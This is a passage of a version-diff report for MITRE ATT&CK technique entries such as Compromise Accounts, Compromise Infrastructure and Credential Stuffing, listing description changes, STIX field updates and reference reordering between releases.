>accounts for [Phishing for Information](https://attack.mitre>eloping social networks, or incorporating photos.  Adversari
>.org/techniques/T1598) or [Phishing](https://attack.mitre.or>es may directly leverage compromised email accounts for [Phi
>g/techniques/T1566).>shing for Information](https://attack.mitre.org/techniques/T
 >1598) or [Phishing](https://attack.mitre.org/techniques/T156
 >6).
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-16 17:15:12.428000+00:002023-04-11 01:08:56.774000+00:00
descriptionAdversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. A variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos. Adversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. A variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.(Citation: AnonHBGary)(Citation: Microsoft DEV-0537) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos. Adversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).
x_mitre_data_sources[0]Persona: Social MediaNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Network Traffic: Network Traffic ContentPersona: Social Media
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft DEV-0537', 'description': 'Microsoft. (2022, March 22). DEV-0537 criminal actor targeting organizations for data exfiltration and destruction. Retrieved March 23, 2022.', 'url': 'https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/'}

[T1584] Compromise Infrastructure

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may compromise third-party infrastructure that ct1Adversaries may compromise third-party infrastructure that c
>an be used during targeting. Infrastructure solutions includ>an be used during targeting. Infrastructure solutions includ
>e physical or cloud servers, domains, and third-party web an>e physical or cloud servers, domains, and third-party web an
>d DNS services. Instead of buying, leasing, or renting infra>d DNS services. Instead of buying, leasing, or renting infra
>structure an adversary may compromise infrastructure and use>structure an adversary may compromise infrastructure and use
> it during other phases of the adversary lifecycle.(Citation> it during other phases of the adversary lifecycle.(Citation
>: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citatio>: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citatio
>n: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens >n: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens 
>Part 2) Additionally, adversaries may compromise numerous ma>Part 2) Additionally, adversaries may compromise numerous ma
>chines to form a botnet they can leverage.  Use of compromis>chines to form a botnet they can leverage.  Use of compromis
>ed infrastructure allows an adversary to stage, launch, and >ed infrastructure allows adversaries to stage, launch, and e
>execute an operation. Compromised infrastructure can help ad>xecute operations. Compromised infrastructure can help adver
>versary operations blend in with traffic that is seen as nor>sary operations blend in with traffic that is seen as normal
>mal, such as contact with high reputation or trusted sites. >, such as contact with high reputation or trusted sites. For
>For example, adversaries may leverage compromised infrastruc> example, adversaries may leverage compromised infrastructur
>ture (potentially also in conjunction with [Digital Certific>e (potentially also in conjunction with [Digital Certificate
>ates](https://attack.mitre.org/techniques/T1588/004)) to fur>s](https://attack.mitre.org/techniques/T1588/004)) to furthe
>ther blend in and support staged information gathering and/o>r blend in and support staged information gathering and/or [
>r [Phishing](https://attack.mitre.org/techniques/T1566) camp>Phishing](https://attack.mitre.org/techniques/T1566) campaig
>aigns.(Citation: FireEye DNS Hijack 2019)   By using comprom>ns.(Citation: FireEye DNS Hijack 2019) Additionally, adversa
>ised infrastructure, adversaries may make it difficult to ti>ries may also compromise infrastructure to support [Proxy](h
>e their actions back to them. Prior to targeting, adversarie>ttps://attack.mitre.org/techniques/T1090).(Citation: amnesty
>s may compromise the infrastructure of other adversaries.(Ci>_nso_pegasus)  By using compromised infrastructure, adversar
>tation: NSA NCSC Turla OilRig)>ies may make it difficult to tie their actions back to them.
 > Prior to targeting, adversaries may compromise the infrastr
 >ucture of other adversaries.(Citation: NSA NCSC Turla OilRig
 >)
Details
values_changed
STIX FieldOld valueNew Value
modified2022-07-26 23:33:26.352000+00:002023-04-12 13:32:15.704000+00:00
descriptionAdversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. Use of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. Use of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may also compromise infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090).(Citation: amnesty_nso_pegasus) By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)
external_references[1]['source_name']FireEye DNS Hijack 2019amnesty_nso_pegasus
external_references[1]['description']Hirani, M., Jones, S., Read, B. (2019, January 10). Global DNS Hijacking Campaign: DNS Record Manipulation at Scale. Retrieved October 9, 2020.Amnesty International Security Lab. (2021, July 18). Forensic Methodology Report: How to catch NSO Group’s Pegasus. Retrieved February 22, 2022.
external_references[1]['url']https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.htmlhttps://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/
external_references[2]['source_name']ICANNDomainNameHijackingFireEye DNS Hijack 2019
external_references[2]['description']ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved March 6, 2017.Hirani, M., Jones, S., Read, B. (2019, January 10). Global DNS Hijacking Campaign: DNS Record Manipulation at Scale. Retrieved October 9, 2020.
external_references[2]['url']https://www.icann.org/groups/ssac/documents/sac-007-enhttps://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html
external_references[3]['source_name']Koczwara Beacon Hunting Sep 2021ICANNDomainNameHijacking
external_references[3]['description']Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved March 6, 2017.
external_references[3]['url']https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2https://www.icann.org/groups/ssac/documents/sac-007-en
external_references[4]['source_name']Mandiant APT1Koczwara Beacon Hunting Sep 2021
external_references[4]['description']Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.
external_references[4]['url']https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdfhttps://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
external_references[5]['source_name']Talos DNSpionage Nov 2018Mandiant APT1
external_references[5]['description']Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign Targets Middle East. Retrieved October 9, 2020.Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.
external_references[5]['url']https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.htmlhttps://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
external_references[6]['source_name']NSA NCSC Turla OilRigTalos DNSpionage Nov 2018
external_references[6]['description']NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October 16, 2020.Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign Targets Middle East. Retrieved October 9, 2020.
external_references[6]['url']https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdfhttps://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html
external_references[7]['source_name']Mandiant SCANdalous Jul 2020NSA NCSC Turla OilRig
external_references[7]['description']Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October 16, 2020.
external_references[7]['url']https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automationhttps://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf
external_references[8]['source_name']ThreatConnect Infrastructure Dec 2020Mandiant SCANdalous Jul 2020
external_references[8]['description']ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.
external_references[8]['url']https://threatconnect.com/blog/infrastructure-research-hunting/https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
external_references[9]['source_name']FireEye EPS Awakens Part 2ThreatConnect Infrastructure Dec 2020
external_references[9]['description']Winters, R. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.
external_references[9]['url']https://web.archive.org/web/20151226205946/https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.htmlhttps://threatconnect.com/blog/infrastructure-research-hunting/
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Domain Name: Active DNSInternet Scan: Response Content
x_mitre_data_sources[2]Internet Scan: Response ContentDomain Name: Domain Registration
x_mitre_data_sources[4]Domain Name: Domain RegistrationDomain Name: Active DNS
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'FireEye EPS Awakens Part 2', 'description': 'Winters, R. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.', 'url': 'https://web.archive.org/web/20151226205946/https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html'}
x_mitre_contributorsShailesh Tiwary (Indian Army)

[T1552.007] Unsecured Credentials: Container API

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator']
values_changed
STIX FieldOld valueNew Value
modified2022-04-01 13:11:10.849000+00:002023-04-15 16:11:25.409000+00:00
external_references[1]['source_name']Docker APIUnit 42 Unsecured Docker Daemons
external_references[1]['description']Docker. (n.d.). Docker Engine API v1.41 Reference. Retrieved March 31, 2021.Chen, J.. (2020, January 29). Attacker's Tactics and Techniques in Unsecured Docker Daemons Revealed. Retrieved March 31, 2021.
external_references[1]['url']https://docs.docker.com/engine/api/v1.41/https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/
external_references[2]['source_name']Kubernetes APIDocker API
external_references[2]['description']The Kubernetes Authors. (n.d.). The Kubernetes API. Retrieved March 29, 2021.Docker. (n.d.). Docker Engine API v1.41 Reference. Retrieved March 31, 2021.
external_references[2]['url']https://kubernetes.io/docs/concepts/overview/kubernetes-api/https://docs.docker.com/engine/api/v1.41/
external_references[3]['source_name']Unit 42 Unsecured Docker DaemonsKubernetes API
external_references[3]['description']Chen, J.. (2020, January 29). Attacker's Tactics and Techniques in Unsecured Docker Daemons Revealed. Retrieved March 31, 2021.The Kubernetes Authors. (n.d.). The Kubernetes API. Retrieved March 29, 2021.
external_references[3]['url']https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/https://kubernetes.io/docs/concepts/overview/kubernetes-api/
x_mitre_version1.11.2

[T1609] Container Administration Command

Current version: 1.2

Version changed from: 1.1 → 1.2

New Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-04-01 13:16:14.786000+00:002023-04-15 16:03:19.642000+00:00
external_references[1]['source_name']Docker Daemon CLIDocker Exec
external_references[1]['description']Docker. (n.d.). DockerD CLI. Retrieved March 29, 2021.Docker. (n.d.). Docker Exec. Retrieved March 29, 2021.
external_references[1]['url']https://docs.docker.com/engine/reference/commandline/dockerd/https://docs.docker.com/engine/reference/commandline/exec/
external_references[2]['source_name']Kubernetes APIDocker Entrypoint
external_references[2]['description']The Kubernetes Authors. (n.d.). The Kubernetes API. Retrieved March 29, 2021.Docker. (n.d.). Docker run reference. Retrieved March 29, 2021.
external_references[2]['url']https://kubernetes.io/docs/concepts/overview/kubernetes-api/https://docs.docker.com/engine/reference/run/#entrypoint-default-command-to-execute-at-runtime
external_references[3]['source_name']Kubernetes KubeletDocker Daemon CLI
external_references[3]['description']The Kubernetes Authors. (n.d.). Kubelet. Retrieved March 29, 2021.Docker. (n.d.). DockerD CLI. Retrieved March 29, 2021.
external_references[3]['url']https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/https://docs.docker.com/engine/reference/commandline/dockerd/
external_references[4]['source_name']Docker EntrypointKubectl Exec Get Shell
external_references[4]['description']Docker. (n.d.). Docker run reference. Retrieved March 29, 2021.The Kubernetes Authors. (n.d.). Get a Shell to a Running Container. Retrieved March 29, 2021.
external_references[4]['url']https://docs.docker.com/engine/reference/run/#entrypoint-default-command-to-execute-at-runtimehttps://kubernetes.io/docs/tasks/debug-application-cluster/get-shell-running-container/
external_references[5]['source_name']Docker ExecKubernetes Kubelet
external_references[5]['description']Docker. (n.d.). Docker Exec. Retrieved March 29, 2021.The Kubernetes Authors. (n.d.). Kubelet. Retrieved March 29, 2021.
external_references[5]['url']https://docs.docker.com/engine/reference/commandline/exec/https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/
external_references[6]['source_name']Kubectl Exec Get ShellKubernetes API
external_references[6]['description']The Kubernetes Authors. (n.d.). Get a Shell to a Running Container. Retrieved March 29, 2021.The Kubernetes Authors. (n.d.). The Kubernetes API. Retrieved March 29, 2021.
external_references[6]['url']https://kubernetes.io/docs/tasks/debug-application-cluster/get-shell-running-container/https://kubernetes.io/docs/concepts/overview/kubernetes-api/
x_mitre_version1.11.2

[T1053.007] Scheduled Task/Job: Container Orchestration Job

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-04-01 13:06:58.794000+00:002023-04-15 16:23:05.392000+00:00
external_references[1]['source_name']Kubernetes JobsKubernetes CronJob
external_references[1]['description']The Kubernetes Authors. (n.d.). Kubernetes Jobs. Retrieved March 30, 2021.The Kubernetes Authors. (n.d.). Kubernetes CronJob. Retrieved March 29, 2021.
external_references[1]['url']https://kubernetes.io/docs/concepts/workloads/controllers/job/https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/
external_references[2]['source_name']Kubernetes CronJobKubernetes Jobs
external_references[2]['description']The Kubernetes Authors. (n.d.). Kubernetes CronJob. Retrieved March 29, 2021.The Kubernetes Authors. (n.d.). Kubernetes Jobs. Retrieved March 30, 2021.
external_references[2]['url']https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/https://kubernetes.io/docs/concepts/workloads/controllers/job/
x_mitre_data_sources[0]File: File CreationScheduled Job: Scheduled Job Creation
x_mitre_data_sources[2]Scheduled Job: Scheduled Job CreationFile: File Creation
x_mitre_version1.21.3

[T1613] Container and Resource Discovery

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-04-12 18:22:05.737000+00:002023-04-15 16:08:50.706000+00:00
x_mitre_version1.01.1

[T1136] Create Account

Current version: 2.3

Version changed from: 2.2 → 2.3

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator']
values_changed
STIX FieldOld valueNew Value
modified2021-08-12 13:04:14.534000+00:002023-04-12 23:24:48.840000+00:00
x_mitre_version2.22.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsAustin Clark, @c2defense
x_mitre_data_sourcesProcess: Process Creation
x_mitre_platformsNetwork
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation

[T1134.002] Access Token Manipulation: Create Process with Token

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may create a new process with a different token t1Adversaries may create a new process with an existing token 
>to escalate privileges and bypass access controls. Processes>to escalate privileges and bypass access controls. Processes
> can be created with the token and resulting security contex> can be created with the token and resulting security contex
>t of another user using features such as <code>CreateProcess>t of another user using features such as <code>CreateProcess
>WithTokenW</code> and <code>runas</code>.(Citation: Microsof>WithTokenW</code> and <code>runas</code>.(Citation: Microsof
>t RunAs)  Creating processes with a different token may requ>t RunAs)  Creating processes with a token not associated wit
>ire the credentials of the target user, specific privileges >h the current user may require the credentials of the target
>to impersonate that user, or access to the token to be used > user, specific privileges to impersonate that user, or acce
>(ex: gathered via other means such as [Token Impersonation/T>ss to the token to be used. For example, the token could be 
>heft](https://attack.mitre.org/techniques/T1134/001) or [Mak>duplicated via [Token Impersonation/Theft](https://attack.mi
>e and Impersonate Token](https://attack.mitre.org/techniques>tre.org/techniques/T1134/001) or created via [Make and Imper
>/T1134/003)).>sonate Token](https://attack.mitre.org/techniques/T1134/003)
 > before being used to create a process.  While this techniqu
 >e is distinct from [Token Impersonation/Theft](https://attac
 >k.mitre.org/techniques/T1134/001), the techniques can be use
 >d in conjunction where a token is duplicated and then used t
 >o create a new process.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-17 14:51:48.978000+00:002023-04-11 21:14:37.714000+00:00
descriptionAdversaries may create a new process with a different token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas.(Citation: Microsoft RunAs) Creating processes with a different token may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used (ex: gathered via other means such as [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003)).Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas.(Citation: Microsoft RunAs) Creating processes with a token not associated with the current user may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used. For example, the token could be duplicated via [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or created via [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) before being used to create a process. While this technique is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001), the techniques can be used in conjunction where a token is duplicated and then used to create a new process.
external_references[1]['source_name']Microsoft RunAsMicrosoft Command-line Logging
external_references[1]['description']Microsoft. (2016, August 31). Runas. Retrieved October 1, 2021.Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017.
external_references[1]['url']https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771525(v=ws.11)https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing
external_references[2]['source_name']Microsoft Command-line LoggingMicrosoft RunAs
external_references[2]['description']Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017.Microsoft. (2016, August 31). Runas. Retrieved October 1, 2021.
external_references[2]['url']https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditinghttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771525(v=ws.11)
x_mitre_data_sources[0]Command: Command ExecutionProcess: OS API Execution
x_mitre_data_sources[1]Process: OS API ExecutionCommand: Command Execution
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsJonny Johnson

[T1110.004] Brute Force: Credential Stuffing

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
external_referencesUS-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019.
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
external_referencesCAPEC-600
values_changed
STIX FieldOld valueNew Value
modified2021-04-06 12:31:06.695000+00:002023-04-14 23:05:16.857000+00:00
external_references[1]['source_name']capecUS-CERT TA18-068A 2018
external_references[1]['url']https://capec.mitre.org/data/definitions/600.htmlhttps://www.us-cert.gov/ncas/alerts/TA18-086A
x_mitre_data_sources[0]User Account: User Account AuthenticationApplication Log: Application Log Content
x_mitre_data_sources[1]Application Log: Application Log ContentUser Account: User Account Authentication
x_mitre_version1.21.3
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'US-CERT TA18-068A 2018', 'description': 'US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-086A'}

[T1589.001] Gather Victim Identity Information: Credentials

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may gather credentials that can be used during tt1Adversaries may gather credentials that can be used during t
>argeting. Account credentials gathered by adversaries may be>argeting. Account credentials gathered by adversaries may be
> those directly associated with the target victim organizati> those directly associated with the target victim organizati
>on or attempt to take advantage of the tendency for users to>on or attempt to take advantage of the tendency for users to
> use the same passwords across personal and business account> use the same passwords across personal and business account
>s.  Adversaries may gather credentials from potential victim>s.  Adversaries may gather credentials from potential victim
>s in various ways, such as direct elicitation via [Phishing >s in various ways, such as direct elicitation via [Phishing 
>for Information](https://attack.mitre.org/techniques/T1598).>for Information](https://attack.mitre.org/techniques/T1598).
> Adversaries may also compromise sites then include maliciou> Adversaries may also compromise sites then add malicious co
>s content designed to collect website authentication cookies>ntent designed to collect website authentication cookies fro
> from visitors.(Citation: ATT ScanBox) Credential informatio>m visitors.(Citation: ATT ScanBox) Credential information ma
>n may also be exposed to adversaries via leaks to online or >y also be exposed to adversaries via leaks to online or othe
>other accessible data sets (ex: [Search Engines](https://att>r accessible data sets (ex: [Search Engines](https://attack.
>ack.mitre.org/techniques/T1593/002), breach dumps, code repo>mitre.org/techniques/T1593/002), breach dumps, code reposito
>sitories, etc.).(Citation: Register Deloitte)(Citation: Regi>ries, etc.).(Citation: Register Deloitte)(Citation: Register
>ster Uber)(Citation: Detectify Slack Tokens)(Citation: Forbe> Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes Gi
>s GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHu>tHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gi
>b Gitrob)(Citation: CNET Leaks) Adversaries may also purchas>trob)(Citation: CNET Leaks) Adversaries may also purchase cr
>e credentials from dark web or other black-markets. Gatherin>edentials from dark web or other black-markets. Finally, whe
>g this information may reveal opportunities for other forms >re multi-factor authentication (MFA) based on out-of-band co
>of reconnaissance (ex: [Search Open Websites/Domains](https:>mmunications is in use, adversaries may compromise a service
>//attack.mitre.org/techniques/T1593) or [Phishing for Inform> provider to gain access to MFA codes and one-time passwords
>ation](https://attack.mitre.org/techniques/T1598)), establis> (OTP).(Citation: Okta Scatter Swine 2022)  Gathering this i
>hing operational resources (ex: [Compromise Accounts](https:>nformation may reveal opportunities for other forms of recon
>//attack.mitre.org/techniques/T1586)), and/or initial access>naissance (ex: [Search Open Websites/Domains](https://attack
> (ex: [External Remote Services](https://attack.mitre.org/te>.mitre.org/techniques/T1593) or [Phishing for Information](h
>chniques/T1133) or [Valid Accounts](https://attack.mitre.org>ttps://attack.mitre.org/techniques/T1598)), establishing ope
>/techniques/T1078)).>rational resources (ex: [Compromise Accounts](https://attack
 >.mitre.org/techniques/T1586)), and/or initial access (ex: [E
 >xternal Remote Services](https://attack.mitre.org/techniques
 >/T1133) or [Valid Accounts](https://attack.mitre.org/techniq
 >ues/T1078)). 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:26:44.352000+00:002023-04-14 23:29:10.396000+00:00
descriptionAdversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts. Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts. Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then add malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub 